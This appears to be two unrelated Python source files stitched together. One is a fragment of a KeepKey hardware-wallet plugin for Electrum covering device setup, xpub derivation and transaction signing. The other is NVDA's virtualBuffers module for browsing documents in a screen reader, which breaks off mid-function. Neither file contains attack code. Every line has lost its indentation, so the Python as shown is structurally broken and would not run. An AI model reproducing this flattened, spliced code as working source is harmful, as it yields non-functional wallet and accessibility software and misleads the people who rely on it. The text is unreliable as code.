t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
__init__.py
|
# -*- coding: UTF-8 -*-
#virtualBuffers/__init__.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2007-2017 NV Access Limited, Peter Vágner
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(unicode):
pass
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
# Symbols that are escaped in the attributes string.
ord(u":"): ur"\\:",
ord(u";"): ur"\\;",
ord(u"\\"): u"\\\\\\\\",
}
# Symbols that must be escaped for a regular expression.
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
escape = lambda text: unicode(text).translate(FINDBYATTRIBS_ESCAPE_TABLE)
reqAttrs = []
regexp = []
if isinstance(attribs, dict):
# Single option.
attribs = (attribs,)
# All options will match against all requested attributes,
# so first build the list of requested attributes.
for option in attribs:
for name in option:
reqAttrs.append(unicode(name))
# Now build the regular expression.
for option in attribs:
optRegexp = []
for name in reqAttrs:
optRegexp.append("%s:" % escape(name))
values = option.get(name)
if not values:
# The value isn't tested for this attribute, so match any (or no) value.
optRegexp.append(r"(?:\\;|[^;])*;")
elif values[0] is VBufStorage_findMatch_notEmpty:
# There must be a value for this attribute.
optRegexp.append(r"(?:\\;|[^;])+;")
elif isinstance(values[0], VBufStorage_findMatch_word):
# Assume all are word matches.
optRegexp.append(r"(?:\\;|[^;])*\b(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(r")\b(?:\\;|[^;])*;")
else:
# Assume all are exact matches or None (must not exist).
optRegexp.append("(?:" )
optRegexp.append("|".join((escape(val)+u';') if val is not None else u';' for val in values))
optRegexp.append(")")
regexp.append("".join(optRegexp))
return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
docHandle=ctypes.c_int()
ID=ctypes.c_int()
NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
self.vbufFieldIdentifier=(docHandle.value,ID.value)
self.vbufNode=vbufNode
@property
def obj(self):
return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)
@property
def label(self):
attrs = {}
def propertyGetter(prop):
if not attrs:
# Lazily fetch the attributes the first time they're needed.
# We do this because we don't want to do this if they're not needed at all.
attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
return attrs.get(prop)
return self._getLabelForProperties(propertyGetter)
def isChild(self,parent):
if self.itemType == "heading":
try:
if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
return True
except (KeyError, ValueError, TypeError):
return False
return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
allowMoveToOffsetPastEnd=False #: no need for end insertion point as vbuf is not editable.
UNIT_CONTROLFIELD = "controlField"
UNIT_FORMATFIELD = "formatField"
def _getControlFieldAttribs(self, docHandle, id):
info = self.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
# Not a control field.
continue
attrs = field.field
if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
return attrs
raise LookupError
def _getFieldIdentifierFromOffset(self, offset):
startOffset = ctypes.c_int()
endOffset = ctypes.c_int()
docHandle = ctypes.c_int()
ID = ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
if not any((docHandle.value, ID.value)):
raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
return docHandle.value, ID.value
def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
if not node:
raise LookupError
start = ctypes.c_int()
end = ctypes.c_int()
NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
return start.value, end.value
def _getPointFromOffset(self,offset):
o = self._getNVDAObjectFromOffset(offset)
if not o.location:
raise LookupError
left, top, width, height = o.location
return textInfos.Point(left + width / 2, top + height / 2)
def _getNVDAObjectFromOffset(self,offset):
try:
docHandle,ID=self._getFieldIdentifierFromOffset(offset)
except LookupError:
log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
return None
return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObjectInBuffer(self,obj):
docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
return self._getOffsetsFromFieldIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObject(self, obj):
while True:
try:
return self._getOffsetsFromNVDAObjectInBuffer(obj)
except LookupError:
pass
# Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
# Use the container in this case.
obj = obj.parent
if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
break
raise LookupError
def __init__(self,obj,position):
self.obj=obj
super(VirtualBufferTextInfo,self).__init__(obj,position)
def _getSelectionOffsets(self):
start=ctypes.c_int()
end=ctypes.c_int()
NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
return start.value,end.value
def _setSelectionOffsets(self,start,end):
NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
def _getCaretOffset(self):
return self._getSelectionOffsets()[0]
def _setCaretOffset(self,offset):
return self._setSelectionOffsets(offset,offset)
def _getStoryLength(self):
return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
def _getTextRange(self,start,end):
if start==end:
return u""
return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
"""Gets the placeholder attribute to be used.
@return: The placeholder attribute when there is no content within the ControlField.
None when the ControlField has content.
@note: The content is considered empty if it holds a single space.
"""
placeholder = attrs.get(placeholderAttrsKey)
# For efficiency, only check if it is valid to return placeholder when we have a placeholder value to return.
if not placeholder:
return None
# Get the start and end offsets for the field. This can be used to check if the field has any content.
try:
start, end = self._getOffsetsFromFieldIdentifier(
int(attrs.get('controlIdentifier_docHandle')),
int(attrs.get('controlIdentifier_ID')))
except (LookupError, ValueError):
log.debugWarning("unable to get offsets used to fetch content")
return placeholder
else:
valueLen = end - start
if not valueLen: # value is empty, use placeholder
return placeholder
# Because fetching the content of the field could result in a large amount of text
# we only do it in order to check for space.
# We first compare the length by comparing the offsets, if the length is less than 2 (ie
# could hold space)
if valueLen < 2:
controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
if not controlFieldText or controlFieldText == ' ':
return placeholder
return None
def _getFieldsInRange(self,start,end):
text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
if not text:
return ""
commandList=XMLFormatting.XMLTextParser().parse(text)
for index in xrange(len(commandList)):
if isinstance(commandList[index],textInfos.FieldCommand):
field=commandList[index].field
if isinstance(field,textInfos.ControlField):
commandList[index].field=self._normalizeControlField(field)
elif isinstance(field,textInfos.FormatField):
commandList[index].field=self._normalizeFormatField(field)
return commandList
def getTextWithFields(self,formatConfig=None):
start=self._startOffset
end=self._endOffset
if start==end:
return ""
return self._getFieldsInRange(start,end)
def _getWordOffsets(self,offset):
#Use VBuf_getBufferLineOffsets with out screen layout to find out the range of the current field
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
def _getLineOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _getParagraphOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _normalizeControlField(self,attrs):
tableLayout=attrs.get('table-layout')
if tableLayout:
attrs['table-layout']=tableLayout=="1"
# convert some table attributes to ints
for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
attrVal=attrs.get(attr)
if attrVal is not None:
attrs[attr]=int(attrVal)
isHidden=attrs.get('isHidden')
if isHidden:
attrs['isHidden']=isHidden=="1"
# Handle table row and column headers.
for axis in "row", "column":
attr = attrs.pop("table-%sheadercells" % axis, None)
if not attr:
continue
cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
# Get the text for the header cells.
textList = []
for docHandle, ID in cellIdentifiers:
try:
start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
except (LookupError, ValueError):
continue
textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
attrs["table-%sheadertext" % axis] = "\n".join(textList)
if attrs.get("landmark") == "region" and not attrs.get("name"):
# We only consider region to be a landmark if it has a name.
del attrs["landmark"]
# Expose a unique ID on the controlField for quick and safe comparison using the virtualBuffer field's docHandle and ID
docHandle=attrs.get('controlIdentifier_docHandle')
ID=attrs.get('controlIdentifier_ID')
if docHandle is not None and ID is not None:
attrs['uniqueID']=(docHandle,ID)
return attrs
def _normalizeFormatField(self, attrs):
strippedCharsFromStart = attrs.get("strippedCharsFromStart")
if strippedCharsFromStart is not None:
assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
return attrs
def _getLineNumFromOffset(self, offset):
return None
def _get_fieldIdentifierAtStart(self):
return self._getFieldIdentifierFromOffset( self._startOffset)
def _getUnitOffsets(self, unit, offset):
if unit == self.UNIT_CONTROLFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
docHandle=ctypes.c_int()
ID=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
return startOffset.value,endOffset.value
elif unit == self.UNIT_FORMATFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
return startOffset.value,endOffset.value
return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
def _get_clipboardText(self):
# Blocks should start on a new line, but they don't necessarily have an end of line indicator.
# Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
return "\r\n".join(blocks)
def activate(self):
self.obj._activatePosition(self)
def getMathMl(self, field):
docHandle = int(field["controlIdentifier_docHandle"])
nodeId = int(field["controlIdentifier_ID"])
obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
TextInfo=VirtualBufferTextInfo
#: Maps root identifiers (docHandle and ID) to buffers.
rootIdentifiers = weakref.WeakValueDictionary()
def __init__(self,rootNVDAObject,backendName=None):
super(VirtualBuffer,self).__init__(rootNVDAObject)
self.backendName=backendName
self.VBufHandle=None
self.isLoading=False
self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
def prepare(self):
if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
# #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
# So at very least don't try to prepare a virtualBuffer as it will fail.
# The user will most likely need to manually move focus away and back again to allow this virtualBuffer to work.
log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
return
self.shouldPrepare=False
self.loadBuffer()
def _get_shouldPrepare(self):
return not self.isLoading and not self.VBufHandle
def terminate(self):
super(VirtualBuffer,self).terminate()
if not self.VBufHandle:
return
self.unloadBuffer()
def _get_isReady(self):
return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(target=self._loadBuffer).start()
def _loadBuffer(self):
try:
if log.isEnabledFor(log.DEBUG):
startTime = time.time()
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(self.rootNVDAObject.appModule.helperLocalBindingHandle,self.rootDocHandle,self.rootID,unicode(self.backendName))
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
if log.isEnabledFor(log.DEBUG):
log.debug("Buffer load took %.3f sec, %d chars" % (
time.time() - startTime,
NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
def _loadBufferDone(self, success=True):
self._loadProgressCallLater.Stop()
del self._loadProgressCallLater
self.isLoading = False
if not success:
self.passThrough=True
return
if self._hadFirstGainFocus:
# If this buffer has already had focus once while loaded, this is a refresh.
# Translators: Reported when a page reloads (example: after refreshing a webpage).
ui.message(_("Refreshed"))
if api.getFocusObject().treeInterceptor == self:
self.event_treeInterceptor_gainFocus()
def _loadProgress(self):
# Translators: Reported while loading a document.
ui.message(_("Loading document..."))
def unloadBuffer(self):
if self.VBufHandle is not None:
try:
watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
except WindowsError:
pass
self.VBufHandle=None
def isNVDAObjectPartOfLayoutTable(self,obj):
docHandle,ID=self.getIdentifierFromNVDAObject(obj)
ID=unicode(ID)
info=self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
tableLayout=None
tableID=None
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==ID:
tableLayout=fieldCommand.field.get('table-layout')
if tableLayout is not None:
return tableLayout
tableID=fieldCommand.field.get('table-id')
break
if tableID is None:
return False
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==tableID:
tableLayout=fieldCommand.field.get('table-layout',False)
break
return tableLayout
def getNVDAObjectFromIdentifier(self, docHandle, ID):
"""Retrieve an NVDAObject for a given node identifier.
Subclasses must override this method.
@param docHandle: The document handle.
@type docHandle: int
@param ID: The ID of the node.
@type ID: int
@return: The NVDAObject.
@rtype: L{NVDAObjects.NVDAObject}
"""
raise NotImplementedError
def getIdentifierFromNVDAObject(self,obj):
"""Retreaves the virtualBuffer field identifier from an NVDAObject.
@param obj: the NVDAObject to retreave the field identifier from.
@type obj: L{NVDAObject}
@returns: a the field identifier as a doc handle and ID paire.
@rtype: 2-tuple.
"""
raise NotImplementedError
def script_refreshBuffer(self,gesture):
if scriptHandler.isScriptWaiting():
# This script may cause subsequently queued scripts to fail, so don't execute.
return
self.unloadBuffer()
self.loadBuffer()
# Translators: the description for the refreshBuffer script on virtualBuffers.
script_refreshBuffer.__doc__ = _("Refreshes the document content")
def script_toggleScreenLayout(self,gesture):
config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
if config.conf["virtualBuffers"]["useScreenLayout"]:
# Translators: Presented when use screen layout option is toggled.
ui.message(_("Use screen layout on"))
else:
# Translators: Presented when use screen layout option is toggled.
ui.message(_("Use screen layout off"))
# Translators: the description for the toggleScreenLayout script on virtualBuffers.
script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
def _searchableAttributesForNodeType(self,nodeType):
pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
raise NotImplementedError
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
offset=pos._startOffset if pos else -1
reqAttrs, regexp = _prepareForFindByAttributes(attribs)
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
if direction=="next":
direction=VBufStorage_findDirection_forward
elif direction=="previous":
direction=VBufStorage_findDirection_back
elif direction=="up":
direction=VBufStorage_findDirection_up
else:
raise ValueError("unknown direction: %s"%direction)
while True:
try:
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
except:
return
if not node:
return
yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
offset=startOffset
def _getTableCellAt(self,tableID,startPos,row,column):
try:
return next(self._iterTableCells(tableID,row=row,column=column))
except StopIteration:
raise LookupError
def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
attrs = {"table-id": [str(tableID)]}
# row could be 0.
if row is not None:
attrs["table-rownumber"] = [str(row)]
if column is not None:
attrs["table-columnnumber"] = [str(column)]
results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
if not startPos and not row and not column and direction == "next":
# The first match will be the table itself, so skip it.
next(results)
for item in results:
yield item.textInfo
def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
# Determine destination row and column.
destRow = origRow
destCol = origCol
if axis == "row":
destRow += origRowSpan if movement == "next" else -1
elif axis == "column":
destCol += origColSpan if movement == "next" else -1
if destCol < 1:
# Optimisation: We're definitely at the edge of the column.
raise LookupError
# Optimisation: Try searching for exact destination coordinates.
# This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
try:
return self._getTableCellAt(tableID,startPos,destRow,destCol)
except LookupError:
pass
# Cells are grouped by row, so in most cases, we simply need to search in the right direction.
for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
elif row > destRow and movement == "next":
# Optimisation: We've gone forward past destRow, so we know we won't find the cell.
# We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
break
if axis == "row" or (axis == "column" and movement == "previous"):
# In most cases, there's nothing more to try.
raise LookupError
else:
# We're moving forward by column.
# In this case, there might be a cell on an earlier row which spans multiple rows.
# Therefore, try searching backwards.
for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
else:
raise LookupError
def _isSuitableNotLinkBlock(self,range):
